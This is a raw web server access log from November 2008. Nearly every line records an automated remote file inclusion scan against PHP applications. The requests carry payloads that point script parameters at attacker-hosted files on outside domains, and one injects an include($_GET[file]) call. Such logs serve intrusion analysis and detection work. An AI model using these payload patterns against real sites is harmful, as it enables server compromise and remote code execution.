75.125.207.2 - - [29/Nov/2008:09:36:52 -0800] "GET /logs/access_080110.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/sobi/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:36:53 -0800] "GET /logs/access_071220.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:36:55 -0800] "GET /purchase.php?jamroom[jm_dir]=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.55.13.210 - - [29/Nov/2008:09:37:01 -0800] "GET /logs/access_080613.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:37:09 -0800] "GET /logs/access_080711.log//main.php?appserv_root=http://www.geocities.com/hidayatkhoir/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:37:09 -0800] "GET /main.php?appserv_root=http://www.geocities.com/hidayatkhoir/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:37:09 -0800] "GET /logs/access_080330.log//main.php?appserv_root=http://www.geocities.com/hidayatkhoir/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:37:10 -0800] "GET /logs//main.php?appserv_root=http://www.geocities.com/hidayatkhoir/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.15.200.252 - - [29/Nov/2008:09:37:13 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect1.php?reflect_base=http://www.ts-telecom.eu/joomla/data/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
72.15.200.252 - - [29/Nov/2008:09:37:13 -0800] "GET /logs/access_080131.log//assets/snippets/reflect/snippet.reflect1.php?reflect_base=http://www.ts-telecom.eu/joomla/data/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
72.15.200.252 - - [29/Nov/2008:09:37:13 -0800] "GET /assets/snippets/reflect/snippet.reflect1.php?reflect_base=http://www.ts-telecom.eu/joomla/data/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:09:37:13 -0800] "GET /logs/access_080522.log//?mosConfig_absolute_path=http://www.geocities.com/lophemiee/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:09:37:13 -0800] "GET /logs//?mosConfig_absolute_path=http://www.geocities.com/lophemiee/id.txt???? HTTP/1.1" 200 75743 "-" "libwww-perl/5.805" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:09:37:14 -0800] "GET /?mosConfig_absolute_path=http://www.geocities.com/lophemiee/id.txt???? HTTP/1.1" 200 94823 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:09:37:20 -0800] "GET /main.php?appserv_root=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:09:37:20 -0800] "GET /logs/access_080711.log//main.php?appserv_root=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:09:37:20 -0800] "GET /logs/access_080330.log//main.php?appserv_root=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:09:37:20 -0800] "GET /logs//main.php?appserv_root=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:09:37:23 -0800] "GET /logs/access_080330.log//main.php?appserv_root=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:09:37:23 -0800] "GET /main.php?appserv_root=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:09:37:24 -0800] "GET /logs/access_080711.log//main.php?appserv_root=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:09:37:24 -0800] "GET /logs//main.php?appserv_root=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:37:28 -0800] "GET /logs/access_080330.log//main.php?appserv_root=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:37:28 -0800] "GET /main.php?appserv_root=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:37:28 -0800] "GET /logs//main.php?appserv_root=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:37:28 -0800] "GET /logs/access_080711.log//main.php?appserv_root=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.120.128.65 - - [29/Nov/2008:09:37:36 -0800] "GET /logs/access_080122.log/errors.php?error=http://millionaire-secrets.bikaigroup.us/images/idbut.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.75.68.8 - - [29/Nov/2008:09:37:49 -0800] "GET /logs/access_080804.log//pjsfiles/modify.php?installed_config_file= HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.176.98 - - [29/Nov/2008:09:38:00 -0800] "GET /logs/access_080618.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.44.72.170 - - [29/Nov/2008:09:38:00 -0800] "GET /logs/access_080619.log/include/bbs.lib.inc.php?site_path=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.176.98 - - [29/Nov/2008:09:38:00 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.44.72.170 - - [29/Nov/2008:09:38:00 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.72.170 - - [29/Nov/2008:09:38:01 -0800] "GET /logs/include/bbs.lib.inc.php?site_path=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.176.98 - - [29/Nov/2008:09:38:01 -0800] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.94.1.95 - - [29/Nov/2008:09:38:39 -0800] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.100nx-fanpage.de/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.94.1.95 - - [29/Nov/2008:09:38:39 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.100nx-fanpage.de/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.64.230.40 - - [29/Nov/2008:09:38:45 -0800] "GET /logs/access_080618.log//load_lang.php?_SERWEB[configdir]=http://musicsalang.com//technote7/data/board/kkkgallery/file/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
219.117.252.226 - - [29/Nov/2008:09:38:46 -0800] "GET /logs/access_080824.log/errors.php?error=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.117.252.226 - - [29/Nov/2008:09:38:46 -0800] "GET /errors.php?error=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.117.252.226 - - [29/Nov/2008:09:38:46 -0800] "GET /logs/errors.php?error=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
79.174.72.73 - - [29/Nov/2008:09:38:47 -0800] "GET /logs/access_080618.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.174.72.73 - - [29/Nov/2008:09:38:47 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.174.72.73 - - [29/Nov/2008:09:38:48 -0800] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.44.72.170 - - [29/Nov/2008:09:39:01 -0800] "GET /logs/access_080628.log/include/bbs.lib.inc.php?site_path=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
90.156.145.189 - - [29/Nov/2008:09:39:17 -0800] "GET /logs/access_081027.log%20%20//?DOCUMENT_ROOT=http://you-buy-viagra.com/files/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.106.227.162 - - [29/Nov/2008:09:39:34 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.106.227.162 - - [29/Nov/2008:09:39:34 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.106.227.162 - - [29/Nov/2008:09:39:34 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.106.227.162 - - [29/Nov/2008:09:39:35 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.195.54.236 - - [29/Nov/2008:09:39:35 -0800] "GET /purchase.php?jamroom[jm_dir]=http://masla.su/image/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
216.195.54.236 - - [29/Nov/2008:09:39:36 -0800] "GET /logs//purchase.php?jamroom[jm_dir]=http://masla.su/image/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
72.15.200.252 - - [29/Nov/2008:09:39:36 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect1.php?reflect_base=http://www.ts-telecom.eu/joomla/data/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
72.15.200.252 - - [29/Nov/2008:09:39:36 -0800] "GET /logs/access_080131.log//assets/snippets/reflect/snippet.reflect1.php?reflect_base=http://www.ts-telecom.eu/joomla/data/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
72.15.200.252 - - [29/Nov/2008:09:39:36 -0800] "GET /assets/snippets/reflect/snippet.reflect1.php?reflect_base=http://www.ts-telecom.eu/joomla/data/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:09:39:38 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.174.73.63 - - [29/Nov/2008:09:39:38 -0800] "GET /logs/access_080618.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.174.73.63 - - [29/Nov/2008:09:39:39 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
90.156.145.189 - - [29/Nov/2008:09:39:39 -0800] "GET /logs/access_081107.log%20%20//?DOCUMENT_ROOT=http://you-buy-viagra.com/files/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.73.63 - - [29/Nov/2008:09:39:39 -0800] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.247.226.253 - - [29/Nov/2008:09:39:42 -0800] "GET /logs/access_080402.log/errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.247.226.253 - - [29/Nov/2008:09:39:42 -0800] "GET /errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.247.226.253 - - [29/Nov/2008:09:39:42 -0800] "GET /logs/errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.20.214 - - [29/Nov/2008:09:39:45 -0800] "GET /logs/access_080415.log//modules/xfsection/modify.php?dir_module=http://musicsalang.com//technote7/data/board/kkkgallery/file/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.214 - - [29/Nov/2008:09:39:46 -0800] "GET /modules/xfsection/modify.php?dir_module=http://musicsalang.com//technote7/data/board/kkkgallery/file/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.214 - - [29/Nov/2008:09:39:46 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://musicsalang.com//technote7/data/board/kkkgallery/file/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:39:46 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:39:46 -0800] "GET /logs/access_080505.log//appserv/main.php?appserv_root=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:39:46 -0800] "GET /logs/access_080401.log//appserv/main.php?appserv_root=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:39:46 -0800] "GET /appserv/main.php?appserv_root=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:09:39:53 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:39:55 -0800] "GET /logs/access_080330.log//appserv/main.php?appserv_root=http://www.geocities.com/hidayatkhoir/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:39:55 -0800] "GET /appserv/main.php?appserv_root=http://www.geocities.com/hidayatkhoir/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:39:55 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.geocities.com/hidayatkhoir/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:39:55 -0800] "GET /logs/access_080711.log//appserv/main.php?appserv_root=http://www.geocities.com/hidayatkhoir/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.154.47 - - [29/Nov/2008:09:40:00 -0800] "GET /logs/access_080702.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.154.47 - - [29/Nov/2008:09:40:00 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.154.47 - - [29/Nov/2008:09:40:01 -0800] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:40:03 -0800] "GET /appserv/main.php?appserv_root=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:40:03 -0800] "GET /logs/access_080330.log//appserv/main.php?appserv_root=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:40:03 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:40:04 -0800] "GET /logs/access_080711.log//appserv/main.php?appserv_root=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.247.226.253 - - [29/Nov/2008:09:40:10 -0800] "GET /logs/access_080220.log/errors.php?error=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.73.130.39 - - [29/Nov/2008:09:40:14 -0800] "GET /logs/homepage.php?sel=http://geocities.com/tester.target/idtester.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.73.130.39 - - [29/Nov/2008:09:40:14 -0800] "GET /logs/access_080828.log/homepage.php?sel=http://geocities.com/tester.target/idtester.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.73.130.39 - - [29/Nov/2008:09:40:14 -0800] "GET /logs/access_080820.log/homepage.php?sel=http://geocities.com/tester.target/idtester.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.73.130.39 - - [29/Nov/2008:09:40:14 -0800] "GET /homepage.php?sel=http://geocities.com/tester.target/idtester.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.44.72.170 - - [29/Nov/2008:09:40:20 -0800] "GET /logs///index.php?_SERVER[DOCUMENT_ROOT]=http://www.djpbn-jateng.go.id/chat/sc.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.72.170 - - [29/Nov/2008:09:40:20 -0800] "GET /logs/access_081008.log///index.php?_SERVER[DOCUMENT_ROOT]=http://www.djpbn-jateng.go.id/chat/sc.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.72.170 - - [29/Nov/2008:09:40:21 -0800] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.djpbn-jateng.go.id/chat/sc.txt??? HTTP/1.1" 200 94883 "-" "libwww-perl/5.803" "www.dmulk.com"
190.54.17.4 - - [29/Nov/2008:09:40:28 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.17.4 - - [29/Nov/2008:09:40:28 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.17.4 - - [29/Nov/2008:09:40:29 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.17.4 - - [29/Nov/2008:09:40:29 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.161.184.100 - - [29/Nov/2008:09:40:39 -0800] "GET /logs/access_080523.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.ovarnews.com/mambots/user/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.161.184.100 - - [29/Nov/2008:09:40:39 -0800] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.ovarnews.com/mambots/user/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.161.184.100 - - [29/Nov/2008:09:40:39 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.ovarnews.com/mambots/user/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.161.184.100 - - [29/Nov/2008:09:40:39 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.ovarnews.com/mambots/user/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
220.73.130.39 - - [29/Nov/2008:09:40:41 -0800] "GET /logs/access_081105.log/homepage.php?sel=http://geocities.com/tester.target/idtester.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.44.72.170 - - [29/Nov/2008:09:40:45 -0800] "GET /logs/access_080722.log///index.php?_SERVER[DOCUMENT_ROOT]=http://www.djpbn-jateng.go.id/chat/sc.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.219.198.195 - - [29/Nov/2008:09:40:50 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://ragas.baarleweb.net/data/bid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.219.198.195 - - [29/Nov/2008:09:40:51 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://ragas.baarleweb.net/data/bid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.30.78.215 - - [29/Nov/2008:09:40:54 -0800] "GET /bikes/?M=A HTTP/1.0" 200 2853 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:09:41:01 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:41:12 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.geocities.com/hidayatkhoir/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:41:12 -0800] "GET /logs/access_080505.log//appserv/main.php?appserv_root=http://www.geocities.com/hidayatkhoir/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:41:12 -0800] "GET /logs/access_080401.log//appserv/main.php?appserv_root=http://www.geocities.com/hidayatkhoir/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:41:13 -0800] "GET /appserv/main.php?appserv_root=http://www.geocities.com/hidayatkhoir/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.195.54.236 - - [29/Nov/2008:09:41:22 -0800] "GET /logs//com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://masla.su/image/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
216.195.54.236 - - [29/Nov/2008:09:41:22 -0800] "GET /com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://masla.su/image/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
80.67.20.214 - - [29/Nov/2008:09:41:57 -0800] "GET /logs/access_080603.log//modules/xfsection/modify.php?dir_module=http://musicsalang.com//technote7/data/board/kkkgallery/file/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.115.110.161 - - [29/Nov/2008:09:41:59 -0800] "GET /logs/access_080717.log/errors.php?error=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:42:00 -0800] "GET /logs/access_080408.log/errors.php?error=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:42:00 -0800] "GET /errors.php?error=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:42:00 -0800] "GET /logs/errors.php?error=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
220.73.130.39 - - [29/Nov/2008:09:42:09 -0800] "GET /logs/access_080820.log%20/homepage.php?sel=http://geocities.com/tester.target/idtester.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
